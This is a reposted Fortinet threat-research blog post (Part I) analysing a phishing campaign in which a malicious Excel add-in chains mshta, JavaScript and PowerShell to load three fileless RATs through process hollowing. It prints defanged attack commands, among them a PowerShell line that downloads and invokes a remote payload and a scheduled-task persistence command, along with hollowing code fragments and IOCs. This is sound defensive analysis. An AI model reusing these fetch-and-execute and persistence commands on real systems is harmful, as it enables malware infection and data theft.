{"id":19025,"date":"2022-05-12T07:40:05","date_gmt":"2022-05-12T15:40:05","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/05\/12\/news-12758\/"},"modified":"2022-05-12T07:40:05","modified_gmt":"2022-05-12T15:40:05","slug":"news-12758","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/05\/12\/news-12758\/","title":{"rendered":"Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT \/ BitRAT \/ PandoraHVNC \u2013 Part I"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Fortinet\u2019s FortiGuard Labs captured a phishing campaign that was delivering three fileless malware onto a victim\u2019s device. Once executed, they are able to steal sensitive information from that device. <\/p>\n<p>In this analysis, I\u2019ll reveal how the phishing campaign manages to transfer the fileless malware to the victim\u2019s device, what mechanism it uses to load, deploy, and execute the fileless malware in the target process, and how it maintains persistence on the victim\u2019s device.<\/p>\n<p style=\"margin-left: 40.0px;\"><b>Affected platforms: <\/b>Microsoft Windows<br \/> <b>Impacted parties: <\/b>Microsoft Windows Users<br \/> <b>Impact:<\/b> Controls victim\u2019s device and collects sensitive information<br \/> <b>Severity level: <\/b>Critical <\/p>\n<h2>Observing the Phishing Email<\/h2>\n<p>The captured <a href=\"https:\/\/www.fortinet.com\/resources\/cyberglossary\/phishing?utm_source=blog&amp;utm_campaign=phishing\">phishing<\/a> email is shown in Figure 1.1. It was disguised as a notification of a payment report from a trusted source.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image.img.png\/1652300705505\/fig1.1..png\" alt=\"phishing email example\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 1.1 \u2013 The phishing email<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This email attempts to trick the recipient into opening the attached Excel document for the report detail. As you can see, this phishing email is detected as spam by the <a href=\"https:\/\/www.fortinet.com\/products\/email-security\/fortimail.html?utm_source=blog&amp;utm_campaign=fortimail-main-page\">FortiMail<\/a> service and has been marked as \u201c[SPAM detected by FortiMail]\u201d in the Subject line to warn the recipient.<\/p>\n<h2>Looking into the Attached Excel Document<\/h2>\n<p>The Excel document is named \u201cRemittance-Details-951244.xlam\u201d. It\u2019s an Excel Add-In (*.xlam) file that contains malicious macros. When the recipient starts it in the Microsoft Excel program, a security notice pops up asking the user if they want to enable the macros, as shown in Figure 2.1.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image_898255838.img.png\/1652300758381\/fig2.1.png\" alt=\"Screenshot of the security notice that launches when opening the Excel document\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 2.1 \u2013 The security notice that launches when opening the Excel document<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>It contains an auto-start Macro that starts using a VBA (Visual Basic Application) method called \u201cAuto_Open()\u201d when the Excel file is opened.<\/p>\n<p>Going through the VBA code inside the method, I learned that it decodes a command string and executes it using a\u00a0<a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/wmisdk\/retrieving-a-class\" target=\"_blank\">WMI<\/a> (Windows Management Instrumentation) object.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image_728691102.img.png\/1652300879925\/fig2.2.png\" alt=\"Example of The WMI object used to execute a decoded command\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 2.2 \u2013 The WMI object used to execute a decoded command<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 2.2 is a snippet of VBA code of the method \u201cAuto_Open()\u201d,\u00a0 showing where it is about to create a WMI object to execute the decoded string command \u201cC:\\ProgramData\\ddond.com hxxps:\/\/taxfile[.]mediafire[.]com\/file\/6hxdxdkgeyq0z1o\/APRL27[.]htm\/file\u201d,\u00a0 as shown in the bottom of Figure 2.2.<\/p>\n<p>Before that, it copies a local file, \u201cC:WindowsSystem32mshta.exe\u201d, into \u201cC:ProgramData\u201d and renames it as \u201cddond.com\u201d. \u201cmshta.exe\u201d is a Windows-native binary file designed to execute Microsoft HTML Application (HTA) files. Remember that \u201cC:ProgramDataddond.com\u201d is now the duplicate of \u201cmshta.exe\u201d, which will be used throughout the campaign. To confuse researchers, for example, it uses the copied \u201cddond.com\u201d file to download and execute the malicious html file rather than \u201cmshta.exe\u201d.<\/p>\n<h2>HTML + JavaScript + PowerShell<\/h2>\n<p>It downloads the \u201cAPRL27.htm\u201d file, which is parsed by \u201cddond.com\u201d (i.e. \u201cmshta.exe\u201d). The HTML file contains a piece of JavaScript code that is encoded using the URL escape method. I decoded it and simplified the code, as shown in Figure 3.1.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image_293147557.img.png\/1652300945637\/fig3.1.png\" alt=\"screenshot of The simplified JavaScript code from APRL27.html\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 3.1 &#8211; The simplified JavaScript code from APRL27.html<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>It creates an object, \u201cWscript.Shell\u201d, using the instruction below. \u201cWscript.Shell\u201d is retrieved using method \u201c_0x5b4b3f(0x391, 0x391)\u201d, which is used to return a string by its index.<\/p>\n<p style=\"text-align: center;\"><span style=\"background-color: rgb(189,195,199);\">chuchukukukaokiwDasidow = new ActiveXObject(_0x5b4b3f(0x391, 0x391));<\/span><\/p>\n<p>\u201cchuchukukukaokiwDasidow\u201d is the created OS Shell object used to run an application. In Figure 3.1 we can see it runs five command-line applications, as follows.<\/p>\n<ul style=\"margin-left: 40.0px;\">\n<li>powershell\u00a0 $MMMMMMM=((neW-ObjEcT ((&quot;Net.Webclient&quot;))).((&quot;Downloadstring&quot;)).invoke(((&quot;hxxps[:]\/\/taxfile[.]mediafire.com\/file\/175lr9wsa5n97x8\/mainpw.dll\/file&quot;))));Invoke-Expression $MMMMMMM<\/li>\n<li>schtasks \/create \/sc MINUTE \/mo 82 \/tn calendersw \/F \/tr &quot;&quot;&quot;%programdata%ddond.com &quot;&quot;&quot;&quot;&quot;&quot; hxxps[:]\/\/www[.]mediafire.com\/file\/c3zcoq7ay6nql9i\/back.htm\/file&quot;&quot;&quot;<\/li>\n<li>taskkill \/f \/im WinWord.exe<\/li>\n<li>taskkill \/f \/im Excel.exe<\/li>\n<li>taskkill \/f \/im POWERPNT.exe<\/li>\n<\/ul>\n<p>It runs the PowerShell application to download a PowerShell file called \u201cmainpw.dll\u201d and then execute it.<\/p>\n<p>It then runs schtasks to create a schedule task named \u201ccalendersw\u201d in the system \u201cTask Scheduler\u201c. It performs the command \u201cC:ProgramDataddond.com hxxps[:]\/\/www[.]mediafire.com\/file\/c3zcoq7ay6nql9i\/back.htm\/file\u201d every 82 minutes, which looks like parsing \u201cAPRL27.html\u201d. It is also a persistence mechanism. Once it starts, back.htm adds more scheduled tasks.<\/p>\n<p>It also runs taskkill to kill processes, if existing, of MS Word (WinWord.exe), MS Excel (Excel.exe), and MS Pointpoint (POWERPNT.exe).<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image_414328273.img.png\/1652302009444\/fig3.2.png\" alt=\"APRL27.htm traffic\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3.2 \u2013 APRL27.htm traffic<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 3.2 is the screenshot of an HTTP proxy program showing the packets from \u201cAPRL27.htm\u201d to \u201cmainpw.dll\u201d marked in the red box. The green box (back.htm) and blue box (Start.htm) are other groups of requests from other \u201cddond.com\u201d commands started by the Task Scheduler.<\/p>\n<p>The \u201cmainpw.dll\u201d file (size 7.58MB) is full of PowerShell code that can be split into three parts for three fileless malware. Figure 3.3 is a display of the simplified structure of \u201cmainpw.dll\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image_792018167.img.png\/1652301964672\/fig3.3.png\" alt=\"Outlines of the PowerShell code inside \u201cmainpw.dll\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 3.3 \u2013 Outlines of the PowerShell code inside \u201cmainpw.dll\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>This code has three code segments and uses the same code logic for each malware. I\u2019ll explain how this works for each <a href=\"https:\/\/www.fortinet.com\/resources\/cyberglossary\/malware?utm_source=blog&amp;utm_campaign=malware\">malware<\/a> through their variables.<\/p>\n<ul style=\"margin-left: 40.0px;\">\n<li>The first \u201c$hexString\u201d contains a dynamic method for performing GZip decompression.<\/li>\n<li>The second \u201c$hexString\u201d contains dynamic PowerShell code that decompresses the malware payload and an inner .Net module file that deploys the malware payload.\u00a0<\/li>\n<li>The \u201c$nona\u201d is a huge byte array that contains the GZip-compressed malware payload. The following PowerShell codes extracted from the second $hexString are used to decompress the malware payload in $nona and the inner .Net module for deploying the malware payload into two local variables.<\/li>\n<\/ul>\n<p style=\"margin-left: 80.0px;\"><span style=\"background-color: rgb(189,195,199);\">[byte[]] <span style=\"color: rgb(41,128,185);\">$RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH<\/span> = Get-<\/span><br \/> <span style=\"background-color: rgb(189,195,199);\">DecompressedByteArray\u00a0<b><span style=\"color: rgb(192,57,43);\">$nona<\/span><\/b><\/span><\/p>\n<p style=\"margin-left: 80.0px;\"><span style=\"background-color: rgb(189,195,199);\">[byte[]] <span style=\"color: rgb(211,84,0);\">$RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG<\/span> =Get-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><br \/> <span style=\"background-color: rgb(189,195,199);\">DecompressedByteArray\u00a0<b><span style=\"color: rgb(192,57,43);\">$STRDYFUGIHUYTYRTESRDYUGIRI<\/span><\/b><\/span><\/p>\n<p>At the end of each malware code segment, the code calls the \u201cLoad()\u201d method to load the inner .Net module from \u201c$RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG\u201d. It then calls the Invoke() method to invoke the \u201cprojFUD.PA.Execute()\u201d function of the inner .Net module with two parameters, which are an exe file\u2019s full path and a fileless malware payload. Here is a piece of the PowerShell code used for the first malware.<\/p>\n<p style=\"margin-left: 80.0px;\"><span style=\"background-color: rgb(189,195,199);\">[Reflection.Assembly]::<\/span><b><span style=\"background-color: rgb(189,195,199);\">Load<\/span><\/b><span style=\"background-color: rgb(189,195,199);\">(<span style=\"color: rgb(211,84,0);\">$RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG<\/span>).GetType(&#8216;projFUD.PA&#8217;).GetMethod(&#8216;Execute&#8217;).<\/span><b><span style=\"background-color: rgb(189,195,199);\">Invoke<\/span><\/b><span style=\"background-color: rgb(189,195,199);\">($null,[object[]] ( &#8216;C:WindowsMicrosoft.NETFrameworkv2.0.50727aspnet_compiler.exe&#8217;,<span style=\"color: rgb(41,128,185);\">$RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH<\/span>))<\/span><\/p>\n<h2>Dynamic .Net Module for Process Hollowing<\/h2>\n<p>It is the inner .Net module that is dynamically extracted from the second $hexString variable. Its function \u201cprojFUD.PA.Execute()\u201d is called from PowerShell, where \u201cprojFUD\u201d is the name space, \u201cPA\u201d is the class name, and \u201cExecute()\u201d is a member function of class \u201cPA\u201d. Figure 4.1 shows a debugger breaking at the entry of this function.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image_1439267125.img.png\/1652301927983\/fig4.1.png\" alt=\"Break at the entry of function \u201cprojFUD.PA.Execute()\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 4.1 \u2013 Break at the entry of function \u201cprojFUD.PA.Execute()\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>From the bottom, in the \u201cLocals\u201d variable sub-tab, we see the two passed parameters. It then performs process hollowing to inject the malware payload into a newly-created process of \u201caspnet_compiler.exe\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image_847181956.img.png\/1652301891841\/fig4.2.png\" alt=\"Creating a suspended process\"\/>         <\/noscript>          <span class=\"cmp-image--title\"> Figure 4.2 \u2013 Creating a suspended process<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The \u201cExecute()\u201d function then calls the Windows API \u201cCreateProcessA()\u201d to create a process of \u201caspnet_compiler.exe\u201d with a Create Flag of 0x8000004. This is a combination of CREATE_NO_WINDOW and CREATE_SUSPENDED, as shown in Figure 4.2.<\/p>\n<p>Next, it allocates memory inside this process and deploys the malware payload data into it. It modifies the value at memory address 0x7EFDE008, where it saves the process\u2019 base address of PEB (Process Environment Block) and modifies the process\u2019 registry to have its EIP (Extended Instruction Pointer) pointing to the copied malware payload. To finish, it needs to call the API WriteProcessMemory() numerous times as well as the API Wow64SetThreadContext().<\/p>\n<p>After all the above steps have been completed, it finally calls the API ResumeThread() to have the process run the malware payload. Below is the code used for calling this API. \u201cprocessInformation.ThreadHandle\u201d is the thread handle of the newly created process.<\/p>\n<p style=\"margin-left: 80.0px;\"><span style=\"background-color: rgb(189,195,199);\">num15\u00a0=\u00a0(int)PA.LX99ujNZ7X3YScj6T4(PA.<span style=\"color: rgb(192,57,43);\">ResumeThread<\/span>,\u00a0PA.vgxYHnXuOV51G6NIu3(&quot;010010010110111001110110011011110110101101100101&quot;),\u00a0CallType.Method,\u00a0<\/span><br \/> <span style=\"background-color: rgb(189,195,199);\">new\u00a0object[]<\/span><br \/> <span style=\"background-color: rgb(189,195,199);\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{<\/span><br \/> <span style=\"background-color: rgb(189,195,199);\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0processInformation.ThreadHandle<\/span><br \/> <span style=\"background-color: rgb(189,195,199);\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0});<\/span><\/p>\n<h2>Conclusion<\/h2>\n<p>In this analysis, I explained how an Excel document attachment to a disguised phishing email is sent to a victim\u2019s device and how the malicious code inside the Excel document is automatically executed once opened by the recipient.<\/p>\n<p>I also showed how the VBA code leads to the access of a remote html file (APRL27.htm) using the copied \u201cmshta.exe\u201d command. This file contains malicious JavaScript code to be executed later. I also demonstrated how it performs persistence by adding tasks into the system \u201cTask Scheduler\u201d to remain in the victim\u2019s device.<\/p>\n<p>I also explained how it obtains three fileless malware in a huge downloaded PowerShell file to bypass detection, and how these are later deployed and executed inside the target processes through Process Hollowing. These three fileless malware are AveMariaRAT \/ BitRAT \/ PandoraHVNC.<\/p>\n<p>In Part 2 of this analysis, I will focus on these three fileless malware to see what they do on the victim\u2019s device, as well as what kind of data they are able to steal.<\/p>\n<h2>Fortinet Protections<\/h2>\n<p>Fortinet customers are already protected from this malware by\u00a0FortiGuard\u2019s\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/web-filtering.html?utm_source=blog&amp;utm_campaign=web-filtering\">Web Filtering<\/a>, AntiVirus,\u00a0<a href=\"https:\/\/www.fortinet.com\/products\/email-security\/fortimail.html?utm_source=blog&amp;utm_campaign=fortimail-main-page\">FortiMail<\/a>,\u00a0<a href=\"https:\/\/www.fortinet.com\/products\/endpoint-security\/forticlient.html?utm_source=blog&amp;utm_campaign=endpoint-web-page\">FortiClient<\/a>,\u00a0<a href=\"https:\/\/www.fortinet.com\/products\/endpoint-security\/fortiedr.html?utm_source=blog&amp;utm_campaign=fortiedr\">FortiEDR<\/a> services, and CDR (content disarm and reconstruction) services, as follows:<\/p>\n<p>All relevant URLs have been rated as &quot;<b>Malicious Websites<\/b>&quot; by the FortiGuard Web Filtering service.<\/p>\n<p>The phishing email with its attached malicious Excel document can be disarmed by the FortiGuard CDR (content disarm and reconstruction) service.<\/p>\n<p>The captured\u00a0Excel sample, the downloaded html file, and the PowerShell file with three fileless malware payload files are detected as &quot;<b>VBA\/Agent.DDON!tr<\/b>&quot;, &quot;<b>JS\/Agent.DDON!tr.dldr<\/b>&quot;, and &quot;<b>PowerShell\/Agent.e535!tr<\/b>&quot; and are blocked by the FortiGuard Antivirus service.<\/p>\n<p><a href=\"https:\/\/www.fortinet.com\/products\/endpoint-security\/fortiedr.html?utm_source=blog&amp;utm_campaign=fortiedr\">FortiEDR<\/a>\u00a0detects both the Excel file and the huge PowerShell file as malicious based on their behavior.<\/p>\n<p>In addition to these protections, we suggest that organizations have their end users also go through the\u00a0FREE\u00a0<a href=\"https:\/\/training.fortinet.com\/?utm_source=blog&amp;utm_campaign=nse-institute\">NSE training<\/a>:\u00a0<a href=\"https:\/\/training.fortinet.com\/local\/staticpage\/view.php?page=nse_1&amp;utm_source=blog&amp;utm_campaign=nse-1\">NSE 1 \u2013 Information Security Awareness<\/a>. It includes a module on Internet threats that is designed to help end users learn how to identify and protect themselves from phishing attacks.<\/p>\n<h2>IOCs<\/h2>\n<h4>URLs:<\/h4>\n<p>hxxps:\/\/taxfile[.]mediafire[.]com\/file\/6hxdxdkgeyq0z1o\/APRL27[.]htm\/file<\/p>\n<p>hxxps:\/\/www[.]mediafire[.]com\/file\/c3zcoq7ay6nql9i\/back[.]htm\/file<\/p>\n<p>hxxps:\/\/www[.]mediafire[.]com\/file\/jjyy2npmnhx6o49\/Start[.]htm\/file<\/p>\n<p>hxxps:\/\/taxmogalupupitpamobitola[.]blogspot[.]com\/atom[.]xml<\/p>\n<h4>Sample SHA-256 Involved in the Campaign:<\/h4>\n<p>[Remittance-Details-951244-1.xlam]<\/p>\n<p>8007BB9CAA6A1456FFC829270BE2E62D1905D5B71E9DC9F9673DEC9AFBF13BFC<\/p>\n<p>[APRL27.htm]<\/p>\n<p>D71ADD25520799720ADD43A5F4925B796BEA11BF55644990B4B9A70B7EAEACBA<\/p>\n<p>[mainpw.dll]<\/p>\n<p>3D71A243E5D9BA44E3D71D4DA15D928658F92B2F0A220B7DEFE0136108871449<\/p>\n<p><i>Learn more about Fortinet\u2019s\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=fortiguard-labs\">FortiGuard Labs<\/a>\u00a0threat research and intelligence organization and the FortiGuard Security Subscriptions and Services\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?tab=security-bundles&amp;utm_source=blog&amp;utm_campaign=security-bundles\">portfolio<\/a>.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-delivering-fileless-malware\/_jcr_content\/root\/responsivegrid\/image.img.png\/1652300705505\/fig1.1..png\"\/><br \/>FortiGuard Labs discovered a phishing campaign delivering fileless malware to steal sensitive information from a victim\u2019s device. Read our analysis to find out more about how the campaign executes and maintains persistence on the victim\u2019s device.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-19025","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19025","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=19025"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19025\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=19025"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=19025"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=19025"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}